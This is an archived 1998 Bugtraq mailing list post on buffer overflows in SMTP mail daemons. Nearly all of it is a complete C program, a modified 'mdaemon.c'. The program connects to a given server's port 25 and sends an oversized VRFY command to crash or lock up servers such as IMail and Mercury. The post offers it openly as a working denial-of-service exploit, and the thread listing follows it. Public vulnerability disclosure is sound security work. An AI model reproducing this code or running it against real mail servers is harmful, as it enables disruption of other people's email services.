Bugtraq mailing list archives
smtp overflows
From: steven () EFNI COM (Jon Beaton)
Date: Wed, 8 Apr 1998 07:10:25 -0400
There have been more posts about the buffer overflows on smtp daemons, so I thought this may be useful. After posting about these attacks on SLMail and Imail, I found that there were alot more that were still affected. On the few I've tried on the Mac, like Mercury, it had locked the server up, much like Appleshare. Anyways, this is just mdaemon.c with just a few tiny changes, just thought it may be useful. Btw, I just wanted to note that this will also crash IMail, even though the author has said it wasn't affected. Jon /* mdaemon.c with a few small changes. known to lock up the whole server with some daemons on the Mac Cisc0 @ Undernet */ #include <stdio.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <string.h> #include <stdlib.h> #include <unistd.h> void main(int argc, char *argv[]) { struct sockaddr_in sin; struct hostent *hp; char *buffer; int sock, i; if (argc != 2) { printf("usage: %s <smtp server>\n", argv[0]); exit(1); } hp = gethostbyname(argv[1]); if (hp==NULL) { printf("Unknown host: %s\n",argv[1]); exit(1); } bzero((char*) &sin, sizeof(sin)); bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length); sin.sin_family = hp->h_addrtype; sin.sin_port = htons(25); sock = socket(AF_INET, SOCK_STREAM, 0); connect(sock,(struct sockaddr *) &sin, sizeof(sin)); buffer = (char *)malloc(1000); sprintf(buffer, "VRFY "); for (i = 0; i<896; i++) strcat(buffer, "d"); strcat(buffer, "\r\n"); write(sock, &buffer[0], strlen(buffer)); close(sock); free(buffer); }
Current thread:
- Re: QW server hole Chris Evans (Apr 07)
- smtp overflows Jon Beaton (Apr 08)
- Re: QW server hole Mike Hardy (Apr 08)
- Official SummerCon Announcement X (Apr 08)
- Sun Security Bulletin #00167 Aleph One (Apr 08)
- CA-98.05 Multiple Vulnerabilities in BIND Aleph One (Apr 08)
- BIND 4.9.7 named follows symlinks, clobbers anything. Joe (Apr 10)
- Re: BIND 4.9.7 named follows symlinks, clobbers anything. Mark.Andrews () CMIS CSIRO AU (Apr 11)
- Re: BIND 4.9.7 named follows symlinks, clobbers anything. Paul A Vixie (Apr 11)
- BIND 4.9.7 named follows symlinks, clobbers anything. Joe (Apr 10)
- BIND 8.1.2-T3B and BIND 4.9.7-T1B (fwd) Jared Mauch (Apr 08)
- Temporary fix for remote exploit in qwsv kevingeo () CRUZIO COM (Apr 09)
- Temporary fix for remote exploit in qwsv [fix] kevingeo () CRUZIO COM (Apr 09)